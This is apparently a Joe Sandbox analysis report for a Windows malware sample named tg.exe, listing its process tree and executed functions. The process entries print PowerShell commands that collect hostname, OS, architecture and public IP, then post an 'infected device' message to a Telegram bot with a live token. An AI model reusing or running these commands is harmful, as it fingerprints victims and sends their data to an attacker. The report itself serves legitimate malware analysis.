MD5 hash:	F8ECEDC88E4D2776486231D0EF0AEA5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	19:10:59
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.bat C:\Users\user\Desktop\tg.exe"
Imagebase:	0x7ff6b47b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	19:10:59
Start date:	22/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	19:10:59
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
Imagebase:	0x7ff6b47b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	19:10:59
Start date:	22/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:11:01
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
Imagebase:	0x7ff6b47b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	19:11:01
Start date:	22/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:11:04
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"
Imagebase:	0x7ff6b47b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:11:04
Start date:	22/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "$env:COMPUTERNAME"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:11:05
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"
Imagebase:	0x7ff6b47b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	19:11:05
Start date:	22/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "[System.Environment]::OSVersion"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:11:05
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
Imagebase:	0x7ff6b47b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	19:11:05
Start date:	22/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	19:11:05
Start date:	22/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:12:07, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	77

Executed Functions

Function 0040A83A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
Part of subcall function 0040E260: HeapReAlloc.KERNEL32(00940000,00000000,?,?), ref: 0040E2C7

LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A863
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A875
wcscpy.MSVCRT ref: 0040A89B
wcscat.MSVCRT ref: 0040A8A6
wcslen.MSVCRT ref: 0040A8AC
CoTaskMemFree.OLE32(?,00000000,00000000,?,00948F58,00000000,00000000), ref: 0040A8BA
FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A8C1
wcscat.MSVCRT ref: 0040A8D9
wcslen.MSVCRT ref: 0040A8DF

Strings

Downloads\, xrefs: 0040A8D3
Shell32.DLL, xrefs: 0040A85E
SHGetKnownFolderPath, xrefs: 0040A86F

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
API String ID: 1740785346-287042676
Opcode ID: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
Instruction ID: ae609db33c227b916d8c96984f24cc4820d8d1ee700964f601e6ad2a5a3ba7d8
Opcode Fuzzy Hash: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
Instruction Fuzzy Hash: C821F871344701B6D2303B62EC4EF6F2A78DB91B90F11483BF901B51D2D6BC8A6199AF

Function 0040195B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7

GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AD4
PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401ADF
PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B1E
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B38

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(00940000,00000000,?), ref: 0040DEF9

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(00940000,00000000,?,?), ref: 0040DF1C

Strings

$pA, xrefs: 00401A73
$pA, xrefs: 00401A20
$pA, xrefs: 00401AC8
$pA, xrefs: 00401B2C

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
String ID: $pA$$pA$$pA$$pA
API String ID: 368575804-1531182785
Opcode ID: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
Instruction ID: 28b0c429ac0839269b991b7b7970ea1d3eb295239ca2258b2b80e935eceb64c8
Opcode Fuzzy Hash: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
Instruction Fuzzy Hash: CD510AB1514600AED600BBB1EC4297F7B7EEB98319F01883FF544690A2CA3D985D9A6D

Function 00401000 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040100F
GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035

Part of subcall function 0040DE30: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
Part of subcall function 0040DE30: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47

Part of subcall function 00409B40: HeapCreate.KERNEL32(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49

Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(004186D0,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691

Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D

Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004186A8,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0

GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A

Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82

Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A418
Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A431
Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A43B

Part of subcall function 0040A348: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A35B
Part of subcall function 0040A348: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A370

Part of subcall function 0040DBCA: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
Part of subcall function 0040DBCA: memset.MSVCRT ref: 0040DC35

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(00940000,00000000,?), ref: 0040DEF9

Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2

HeapDestroy.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011B5
ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011BA

Strings

.pA, xrefs: 00401085
:pA, xrefs: 0040112D

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorHandleLastLibrarySectionValue$CommonControlsDestroyEnumExitInitLoadModuleProcessResourceTypes
String ID: .pA$:pA
API String ID: 2062415080-1142403416
Opcode ID: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
Instruction ID: 59fd392a0a4490bdbbe753bcbaae00d60dcbf108960a32b110b84fea6de29b28
Opcode Fuzzy Hash: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
Instruction Fuzzy Hash: 6C313070A80704A9D210B7F29D43F9E3A25AB1874DF51843FB644790E3CEBC55489A6F

Function 00403DF3 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 640
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(00940000,00000000,?), ref: 0040DEF9

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(00940000,00000000,?,?), ref: 0040DF1C

GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,00948F58,00000000,00000000), ref: 004042FB
PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4

Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32(00948F58,00948F58,00002710), ref: 00402C34

Part of subcall function 0040E080: TlsGetValue.KERNEL32(0000000D,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E08A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 004098C0: SetEnvironmentVariableW.KERNEL32(00948F58,00948F58,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9

Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,00948F58,00948968,00000000,00000000), ref: 00401E8A

PathQuoteSpacesW.SHLWAPI(00000000,00000001,009489E0,00000000,00000000,00000000,00000000,00000000,00948F58,00948968,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,0041702A,00000000,00000000,00000000,00000001,009489E0,00000000,00000000,00000000,00000000,00000000,00948F58,00948968), ref: 004044E1

Part of subcall function 00405492: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,00948F58), ref: 004054AB
Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523

Strings

*pA, xrefs: 0040452C
pA, xrefs: 00404090
*pA, xrefs: 004044BE

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
String ID: *pA$*pA$pA
API String ID: 1881381519-978732049
Opcode ID: ce5de05abebdf408f752614a87581667f3532eea130c2f8d7aa08e5aeff42770
Instruction ID: c37fc5d70f496ddafb25d76fc072764247fdd107690a54ecab0fee76e679e4b9
Opcode Fuzzy Hash: ce5de05abebdf408f752614a87581667f3532eea130c2f8d7aa08e5aeff42770
Instruction Fuzzy Hash: 452219B5504700AED200BBB2D981A7F77BDEB94709F10CD3FF544AA192CA3CD8499B69

Function 0040A756 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
Part of subcall function 0040E260: HeapReAlloc.KERNEL32(00940000,00000000,?,?), ref: 0040E2C7

GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A76D
LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A77A
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A78C
GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A799
FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A79E

Strings

Kernel32.DLL, xrefs: 0040A773
GetLongPathNameW, xrefs: 0040A786

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 820969696-2943376620
Opcode ID: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
Instruction ID: 045e3bd93f30ce5257affd3ba06db84d60efd2c3f80f990f00f7183b84a9fd71
Opcode Fuzzy Hash: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
Instruction Fuzzy Hash: C0F0BE722052147FC2212BBAAC4CDAB3E7CDE96752700413AF905E2252EA79881082BD

Function 0040AAC0 Relevance: 9.2, APIs: 6, Instructions: 157
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB31
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB72
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040ABBC
CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040ABDE
HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040AC17
SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC6A

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: File$Create$AllocHeapPointer
String ID:
API String ID: 4207849991-0
Opcode ID: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
Instruction ID: b1ded5e7b3c1179952fb066da43177db28dec5f90817629197f40925782b5e59
Opcode Fuzzy Hash: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
Instruction Fuzzy Hash: 1F51C0712483006BE3218F19DD44B6B7BF6EB44764F204A3AFA51A73E0D678EC55874A

Function 0040D819 Relevance: 7.6, APIs: 5, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00418624,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D85A
HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D891
LeaveCriticalSection.KERNEL32(00418624,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8EA
RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D8FB
InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D937

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

